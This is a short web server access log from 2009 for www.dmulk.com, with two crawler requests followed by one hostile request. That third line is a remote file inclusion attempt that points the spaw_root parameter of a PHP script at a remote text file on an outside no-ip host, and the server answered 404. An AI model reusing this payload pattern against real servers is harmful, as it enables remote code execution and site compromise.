67.195.112.160 - - [16/Sep/2009:09:22:55 -0700] "GET /logs/access_081124.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:09:22:58 -0700] "GET /logs/access_090601.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.122.72.216 - - [16/Sep/2009:09:22:59 -0700] "GET /logs/access_080914.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
